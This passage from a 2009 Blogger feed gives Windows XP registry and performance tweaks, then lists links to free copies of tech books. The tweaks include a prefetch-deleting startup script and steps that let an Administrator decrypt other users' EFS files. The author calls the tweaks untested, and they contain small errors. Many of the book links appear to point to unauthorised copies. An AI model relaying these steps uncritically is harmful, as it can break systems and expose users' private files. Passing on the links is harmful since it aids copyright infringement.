Sound,Speech and Audio devices -&gt; Sounds and Audio Devices -&gt; Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system.&lt;br /&gt;&lt;br /&gt;SHUTDOWN XP FASTER 2.&lt;br /&gt;Start Regedit.&lt;br /&gt;Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.&lt;br /&gt;Click on the "Control" Folder.&lt;br /&gt;Select "WaitToKillServiceTimeout"&lt;br /&gt;Right click on it and select Modify.&lt;br /&gt;Set it a value lower than 2000 (Mine is set to 200).&lt;br /&gt;&lt;br /&gt;EASIEST WAY TO DELETE PREFETCH.&lt;br /&gt;1. Open notepad.exe, type del c:\windows\prefetch\*.* /q (without the quotes) &amp; save as "delprefetch.bat" in c:\&lt;br /&gt;2. From the Start menu, select "Run..." &amp; type "gpedit.msc".&lt;br /&gt;3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Startup" in the right window.&lt;br /&gt;4. In the new window, click "add", "Browse", locate your "delprefetch.bat" file &amp; click "Open".&lt;br /&gt;5. Click "OK", "Apply" &amp; "OK" once again to exit.&lt;br /&gt;6. Reboot your computer.&lt;br /&gt;&lt;br /&gt;SPEED UP MENU DISPLAY.&lt;br /&gt;When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly. Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.&lt;br /&gt;Navigate to HKEY_CURRENT_USER\Control Panel\Desktop&lt;br /&gt;Select MenuShowDelay from the list on the right.&lt;br /&gt;Right on it and select Modify.&lt;br /&gt;Change the value to 0.&lt;br /&gt;Reboot your computer.&lt;br /&gt;&lt;br /&gt;16 COLOUR ICONS.&lt;br /&gt;If you select 16bit mode for graphics your icons will revert to using 8bit (16 color) icons. Yuck! Change the following registry setting to:&lt;br /&gt;[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics] "Shell Icon BPP"="16" "Shell Icon Size"="32" Setting the BPP to 16bit will yield 65565 colors for icons.&lt;br /&gt;&lt;br /&gt;DE-CRYPT ENCRYPTED FILES ON WINDOWS XP.&lt;br /&gt;1. Login as Administrator&lt;br /&gt;2. Go to Start/Run and type in cmd and click OK.&lt;br /&gt;At the prompt type cipher /r:Eagent and press enter&lt;br /&gt;This prompt will then display:&lt;br /&gt;Please type in the password to protect your .PFX file:&lt;br /&gt;Type in your Administrator password&lt;br /&gt;Re-confirm your Administrator password&lt;br /&gt;The prompt will then display&lt;br /&gt;Your .CER file was created successfully.&lt;br /&gt;Your .PFX file was created successfully.&lt;br /&gt;The Eagent.cer and Eagent.pfx files will be saved in the current directory that is shown at the command prompt. Example: The command prompt displays&lt;br /&gt;C:\Documents and Settings\admin&gt; the two files are saved in the admin folder. (For security concerns, you should house the two files in your Administrator folder or on a floppy disk).&lt;br /&gt;3. Go to Start/Run and type in certmgr.msc and click OK. This will launch the Certificates Manager. Navigate to Personal and right click on the folder and select All Tasks/Import. The Certificate Import Wizard will appear. Click Next. Browse to the C:\Documents and Settings\admin folder. In the Open dialog box, change the Files of Type (at the bottom) to personal Information Exchange (*.pfx,*.P12). Select the file Eagent.pfx and click Open. Click Next. Type in your Administrator password (leave the two checkboxes blank) and click Next. Make sure the Radio button is active for the first option (Automatically select the certificate store based on the type of certifcate). Click Next. Click Finish. (You'll receive a message that the import was successful). To confirm the import, close Certificates Manager and re-open it. Expand the Personal folder and you will see a new subfolder labeled Certificates. Expand that folder and you will see the new entry in the right side column. Close Certificate Manager.&lt;br /&gt;4. Go to Start/Run and type in secpol.msc and click OK. This will launch the Local Security Policy. Expand the Public Key Policies folder and then right click on the Encrypted File System subfolder and select Add Data Recovery Agent... The Wizard will then display. Click Next. Click the Browse Folders... button. Browse to the C:\Documents and Settings\admin folder. Select the Eagent.cer file and click Open. (The wizard will display the status User_Unknown. That's ok). Click Next. Click Finish. You will see a new entry in the right side column. Close the Local Security Policy.&lt;br /&gt;You, the Administrator are now configured as the default Recovery Agent for All Encrypted files on the Local Machine.&lt;br /&gt;To Recover Encrypted files: Scenario #1&lt;br /&gt;If you have completed the above steps BEFORE an existing user encrypted his/her files, you can log in to your Administrator account and navigate to the encrypted file(s). Double click on the file(s) to view the contents.&lt;br /&gt;Scenario #2&lt;br /&gt;If you have completed the above steps AFTER an existing user has already encrypted his/her files, you must login to the applicable User's User Account and then immediately logout. Next, login to your Administrator account and navigate to the encrypted file(s). Double click on the file(s) to view the contents.&lt;br /&gt;*Warning Do not Delete or Rename a User's account from which will want to Recover the Encrypted Files. You will not be able to de-crypt the files using the steps outlined above.&lt;br /&gt;&lt;br /&gt;DUMP FILES TWEAK &amp; DISABLE DR.WATSON.&lt;br /&gt;"Dump file. A dump file stores data from memory during a system crash and can be helpful when diagnosing problems, but like a swap file, it can also expose a lot of sensitive, unencrypted data. To prevent Windows from creating the file, go to Control Panel | System. Click on the Advanced tab and then the Settings button on the Startup and Recovery pane. Set the drop-down menu under Write debugging information to (none). "Similarly, the debugging program Dr. Watson saves information when applications crash. To disable it, go to:&lt;br /&gt;HKEY_local_machine\software\Microsoft\WindowsNT\CurrentVersion\ AeDebug and set the Auto string to 0. Then use Windows Explorer to go to Documents and Settings\All Users\Shared Documents\DrWatson. Delete User.dmp and Drwtsn32.log, the insecure logs the program creates." Heed related advice from 'microsoft' regarding 'Disable Dr.Watson' first before the preceding Dr. Watson advice (go Google search.) Back up with System Restore, and go ahead. As cautious as I am, I have gladly applied these tweaks, and followed related microsot advice on Dr. Watson.&lt;br /&gt;&lt;br /&gt;Precaution: Backups All Of Your Data Before Tweaking, Not All Of The Tips I've Mentioned Above Were Tested. I Don't Responsible For Any Damages. Happy Experiments</description><link>http://zts-zts.blogspot.com/2009/09/xp-tweaks.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-1150615522293647774</guid><pubDate>Mon, 28 Sep 2009 06:18:00 +0000</pubDate><atom:updated>2009-09-27T23:19:26.554-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ebooks</category><title>200+Tech books</title><description>1&lt;br /&gt;10 minute guide to lotus notes mail 4.5&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;2&lt;br /&gt;10 minute guide to Microsoft exchange 5.0&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;3&lt;br /&gt;10 minute guide to outlook 97&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;4&lt;br /&gt;10 minute guide to schedule+ for windows 95&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;5&lt;br /&gt;ActiveX programming unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;6&lt;br /&gt;ActiveX programming unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;7&lt;br /&gt;Advanced perl programming&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;8&lt;br /&gt;Advanced PL/SQL programming with packages&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;9&lt;br /&gt;Adventure in Prolog/AMZI&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;10&lt;br /&gt;Algorithms CMSC251/Mount, David&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;11&lt;br /&gt;Alison Balter's Mastering Access 95 development, premier ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;12&lt;br /&gt;Apache : The definitive guide, 3rd.ed.&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;13&lt;br /&gt;Beej's guide to network programming/Hall, Brain&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;14&lt;br /&gt;Beyond Linux from Scratch/BLFS Development Team&lt;br /&gt;http://book.onairweb.net/computer/os/linux/Administration/Beyond_Linux_From_Scratch/&lt;br /&gt;&lt;br /&gt;15&lt;br /&gt;Borland C++ builder unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;16&lt;br /&gt;Building an intranet with windows NT 4&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;17&lt;br /&gt;Building an Intranet with Windows NT 4&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;18&lt;br /&gt;Building expert systems in prolog/AMZI&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;19&lt;br /&gt;C programming language&lt;br /&gt;http://book.onairweb.net/computer/pl/C/The_C_Programming_Language_by_K&amp;R/&lt;br /&gt;&lt;br /&gt;20&lt;br /&gt;C Programming/Holmes, Steven&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;21&lt;br /&gt;C++ Annotations&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;22&lt;br /&gt;CGI developer's guide&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;23&lt;br /&gt;CGI manual of style&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;24&lt;br /&gt;CGI manual of style online&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;25&lt;br /&gt;CGI programming&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;26&lt;br /&gt;CGI programming unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;27&lt;br /&gt;CGI programming with Perl, 2nd.ed.&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;28&lt;br /&gt;Charlie Calvert's Borland C++ builder unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;29&lt;br /&gt;Client/server computing, 2nd.ed.&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;30&lt;br /&gt;Client-server computing, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;31&lt;br /&gt;Common LISP, the language/Steele, Guy&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;32&lt;br /&gt;Compilers and compiler generators : an introduction with C++/Terry, P.D.&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;33&lt;br /&gt;Complete idiot's guide to creating HTML webpage&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;34&lt;br /&gt;Computer graphics CMSC 427/Mount, David&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;35&lt;br /&gt;Configuring and troubleshooting the windows NT/95 registry&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;36&lt;br /&gt;Creating commercial websites&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;37&lt;br /&gt;Creating web applets with Java&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;38&lt;br /&gt;Crystal Reports.NET&lt;br /&gt;http://www.crystalreportsbook.com/Chapters.asp&lt;br /&gt;&lt;br /&gt;39&lt;br /&gt;Curious about the internet&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;40&lt;br /&gt;Curious about the internet?&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;41&lt;br /&gt;Dan appleman's developing activeX components with Visual Basic 5&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;42&lt;br /&gt;Dan appleman's developing activex components with Visual Basic 5.0&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;43&lt;br /&gt;Data structures CMSC420/Mount, David&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;44&lt;br /&gt;Database developer's guide with visual basic 4, 2nd.ed.&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;45&lt;br /&gt;Database developer's guide with Visual Basic 4, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;46&lt;br /&gt;Database developer's guide with Visual C++ 4, 2nd.ed.&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;47&lt;br /&gt;Database developer's guide with Visual C++ 4, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;48&lt;br /&gt;Design and analysis of computer algorithms CMSC451/Mount, David&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;49&lt;br /&gt;Designing implementing Microsoft internet information server&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;50&lt;br /&gt;Designing implementing Microsoft proxy server&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;51&lt;br /&gt;Developing for netscape one&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;52&lt;br /&gt;Developing intranet applications with java&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;53&lt;br /&gt;Developing personal oracle 7 for windows 95 applications&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;54&lt;br /&gt;Developing personal Oracle 7 for windows 95 applications&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;55&lt;br /&gt;Developing professional java applets&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;56&lt;br /&gt;Developing professional java applets&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;57&lt;br /&gt;DNS and BIND&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;58&lt;br /&gt;Doing objects with VB.NET and C#&lt;br /&gt;http://vbwire.com/nl?6814&lt;br /&gt;&lt;br /&gt;59&lt;br /&gt;EAI/BPM Evaluation Series: IBM WebSphere MQ Workflow v3.3.2 &amp; EAI Suite by&lt;br /&gt;&gt; Middleware Technology Evaluation Series, Phong Tran &amp; Jeffrey Gosper&lt;br /&gt;http://www.cmis.csiro.au/mte/reports/BPM_IBMwebsphereMQ332.htm&lt;br /&gt;&lt;br /&gt;60&lt;br /&gt;Effective AWK programming&lt;br /&gt;http://book.onairweb.net/computer/os/shell/Effective_AWK_Programming/&lt;br /&gt;&lt;br /&gt;61&lt;br /&gt;Enterprise javabeans, 2nd.ed.&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;62&lt;br /&gt;Exploring java&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;63&lt;br /&gt;GNOME/Sheets, John&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;64&lt;br /&gt;Graph theory/Prof. Even&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;65&lt;br /&gt;Hacking java&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;66&lt;br /&gt;How intranets work&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;67&lt;br /&gt;How intranets work&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;68&lt;br /&gt;How to program visual basic 5.0&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;69&lt;br /&gt;How to use HTML 3.2&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;70&lt;br /&gt;Html : The definitive guide&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;71&lt;br /&gt;HTML 3.2 &amp; CGI unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;72&lt;br /&gt;HTML 3.2 and CGI professional reference edition unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;73&lt;br /&gt;HTML by example&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;74&lt;br /&gt;Internet firewall&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;75&lt;br /&gt;Intranets unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;76&lt;br /&gt;Introduction to object-oriented programming using C++/Muller, Peter&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;77&lt;br /&gt;Introduction to programming using Java/Eck, David&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;78&lt;br /&gt;Introduction to socket programming&lt;br /&gt;http://book.onairweb.net/computer/network/An_Introduction_to_Socket_Programming/&lt;br /&gt;&lt;br /&gt;79&lt;br /&gt;Java 1.1 unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;80&lt;br /&gt;Java 1.1 unleashed, 2nd.ed.&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;81&lt;br /&gt;Java 1.1 unleashed, 3rd.ed.&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;82&lt;br /&gt;Java 114 documentation&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;83&lt;br /&gt;Java AWT reference&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;84&lt;br /&gt;Java by example&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;85&lt;br /&gt;Java developer's guide&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;86&lt;br /&gt;Java developer's guide&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;87&lt;br /&gt;Java developer's reference&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;88&lt;br /&gt;Java developer's reference&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;89&lt;br /&gt;Java Distributed computing&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;90&lt;br /&gt;Java enterprise&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;91&lt;br /&gt;Java enterprise in a nutshell&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;92&lt;br /&gt;Java foundation classes in a nutshell&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;93&lt;br /&gt;Java fundamental classes reference&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;94&lt;br /&gt;Java in a nutshell&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;95&lt;br /&gt;Java in a nutshell, 3rd.ed.&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;96&lt;br /&gt;Java language reference&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;97&lt;br /&gt;Java security&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;98&lt;br /&gt;Java servlet programming&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;99&lt;br /&gt;Java unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;100&lt;br /&gt;Java unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;101&lt;br /&gt;Java, 2nd.ed.&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;102&lt;br /&gt;_JavaScript : the definitive guide&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;103&lt;br /&gt;_Javascript manual of style&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;104&lt;br /&gt;_Javascript manual of style&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;105&lt;br /&gt;Josh's GNU Linux Guide/Joshua&lt;br /&gt;http://book.onairweb.net/computer/os/linux/Administration/Josh's_GNU_Linux_Guide/&lt;br /&gt;&lt;br /&gt;106&lt;br /&gt;Late night activex&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;107&lt;br /&gt;Late night activeX&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;108&lt;br /&gt;Laura lemay's 3D graphics in and VRML 2&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;109&lt;br /&gt;Laura lemay's activex and _VBScript&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;110&lt;br /&gt;Laura lemay's graphics and web page design&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;111&lt;br /&gt;Laura lemay's guide to sizzling websites design&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;112&lt;br /&gt;Laura lemay's _javascript 1.1&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;113&lt;br /&gt;Laura lemay's web workshop activex and _VBScript&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;114&lt;br /&gt;Laura lemay's web workshop Graphics web page design&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;115&lt;br /&gt;Laura lemay's web workshop _javascript&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;116&lt;br /&gt;Learning perl&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;117&lt;br /&gt;Learning perl on win32&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;118&lt;br /&gt;Learning the kornshell&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;119&lt;br /&gt;Learning unix&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;120&lt;br /&gt;Learning vi&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;121&lt;br /&gt;Linux from Scratch/Beekmans, Gerard&lt;br /&gt;http://book.onairweb.net/computer/os/linux/Administration/Linux_From_Scratch/&lt;br /&gt;&lt;br /&gt;122&lt;br /&gt;Linux in a nutshell, 3rd.ed.&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;123&lt;br /&gt;Linux kernel/Rusling, David&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;124&lt;br /&gt;Linux network administrator's guide/Dawson, Terry&lt;br /&gt;www.oopweb.com&lt;br /&gt;&lt;br /&gt;125&lt;br /&gt;Linux system administrator's survival guide&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;126&lt;br /&gt;MAPI, SAPI and TAPI developer's guide&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;127&lt;br /&gt;Mastering access 95 development&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;128&lt;br /&gt;Microsoft access 97 quick reference&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;129&lt;br /&gt;Microsoft access 97 quick reference&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;130&lt;br /&gt;Microsoft backoffice 2 unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;131&lt;br /&gt;Microsoft excel 97 quick reference&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;132&lt;br /&gt;Microsoft excel 97 quick reference&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;133&lt;br /&gt;Microsoft exchange server survival guide&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;134&lt;br /&gt;Microsoft frontpage unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;135&lt;br /&gt;Microsoft word 97 quick reference&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;136&lt;br /&gt;Microsoft word 97 quick reference&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;137&lt;br /&gt;Microsoft works 4.5 6-In-1&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;138&lt;br /&gt;More than 100 full-text e-books&lt;br /&gt;http://www.allfreetech.com/EBookCategory.asp&lt;br /&gt;&lt;br /&gt;139&lt;br /&gt;Ms backoffice administrator's survival guide&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;140&lt;br /&gt;Ms backoffice unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;141&lt;br /&gt;Mysql and msql&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;142&lt;br /&gt;Netscape plug-ins developer's kit&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;143&lt;br /&gt;Official gamelan java directory&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;144&lt;br /&gt;Oracle built-in packages&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;145&lt;br /&gt;Oracle PL/SQL built-in pocket reference&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;146&lt;br /&gt;Oracle PL/SQL language pocket reference&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;147&lt;br /&gt;Oracle PL/SQL programming guide to Oracle 8 features&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;148&lt;br /&gt;Oracle PL/SQL programming, 2nd.ed.&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;149&lt;br /&gt;Oracle unleashed&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;150&lt;br /&gt;Oracle unleashed&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;151&lt;br /&gt;Oracle web applications PL/SQL developer's introduction&lt;br /&gt;http://www.hk8.org/old_web/&lt;br /&gt;&lt;br /&gt;152&lt;br /&gt;Patterns of enterprise application architecture/Fowler, Martin&lt;br /&gt;http://www.awprofessional.com/catalog/product.asp?product_id={574D77DF-6ED2-BC5-A6A8-02E59CA7482D}&lt;br /&gt;&lt;br /&gt;153&lt;br /&gt;PC week : the intranet advantage&lt;br /&gt;http://www.parsian.net/set1252/pages/books.htm&lt;br /&gt;&lt;br /&gt;154&lt;br /&gt;Perl 5 by example&lt;br /&gt;http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/&lt;br /&gt;&lt;br /&gt;155&lt;br /&gt;Perl 5 quick reference&lt;br 